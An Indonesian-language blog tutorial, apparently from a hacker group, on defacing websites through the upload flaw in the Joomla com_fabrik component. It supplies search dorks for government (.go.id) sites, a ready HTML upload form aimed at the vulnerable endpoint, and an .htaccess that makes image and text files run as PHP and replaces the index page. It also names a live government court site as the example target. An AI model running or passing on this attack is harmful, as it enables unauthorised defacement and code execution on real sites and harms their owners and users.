DEFACE COM_FABRIK + TEBAS INDEX

  DEFACE COM_FABRIK + TEBAS INDEX


Selamat malam minggu semuanya bertemu lagi dengan saya SanSORiugan yang gans:v
kali ini saya mau share tutorial deface com fabrik + tebas index.

ok langsung saja :

-Bahan Bahan yang di butuhkan adalah


- Dork Com_Fabrik

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:go.id
inurl:index.php?option=com_fabrik&view= site:go.id
inurl:importcsv.php site:go.id

(site nya bisa di ganti selain go.id / dork bisa di kembangin sendiri )


- Csrf Com_Fabrik :


 <title>INDONESIAN FIGHTER CYBER</title>
<br> <br> <font size="10">CSRF COM FABRIK</h1>
<br>
<br>    
<form method="POST" action="http://site.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
enctype="multipart/form-data">    
<input type="file" name="file"><button>Croott'zz</button>    
</form> </center><br></font> <font size="4">KEEP CALM AND STAY COOL<br>
 Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

- File .htaccess :

DirectoryIndex index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

- Script Deface Pasti Udah Pada Punya :v

- Exploit /index.php?option=com_fabrik&amp;format=raw&amp;task=plugin.pluginAjax&amp;plugin=fileupload&amp;method=ajax_upload

- Live Target: http://pn-maros.go.id


langsung saja ke tutorial nya



1) Dorking Seperti Biasa cari site yang kira kira vlun


2) Kalau dah dapet masukan exploit nya contoh


"http://pn-maros.go.id/index.php?option=com_fabrik&amp;format=raw&amp;task=plugin.pluginAjax&amp;plugin=fileupload&amp;method=ajax_upload"

 Kalau Vlun muncul tulisan seperti ini




3) Selanju nya kita edit script csrf nya untuk mengupload file htaccess nya


    Edit Yang Bagian Ini saja http://site.com ganti dengan site yang mau di

    eksekusi ya :v


 

    Kalau Udah di edit jangan lupa save ya :v


4) Selanjut nya Edit File  htaccess nya Edit Di Bagian

     "DirectoryIndex frogs.html"

     frogs.html ganti dengan nama scrip deface kalian


     Kalau sudah selesai ngedit nya buka csrf nya


5)  Upload File .htaccess Nya dulu kalau berhasil ada tulisan kayak gini


    {"filepath":"\/.htaccess","uri":"http:\/\/pn-maros.go.id\/.htaccess"}



    Kalau udah berhasil UP  flie htaccess nya langsung saja up script deface  

    kalian Kalau Dah Selesai Up .htaccess Dan Script Nya langsung aja cek web

    nya

    kalau gak ke deface ya cari web lagi jangan putus asa


Ok sekian dulu tutorial dari saya karena ini malam minggu saya juga perlu malam mingguan dulu...

sumber : https://www.lamonganxploiter.tech

Komentar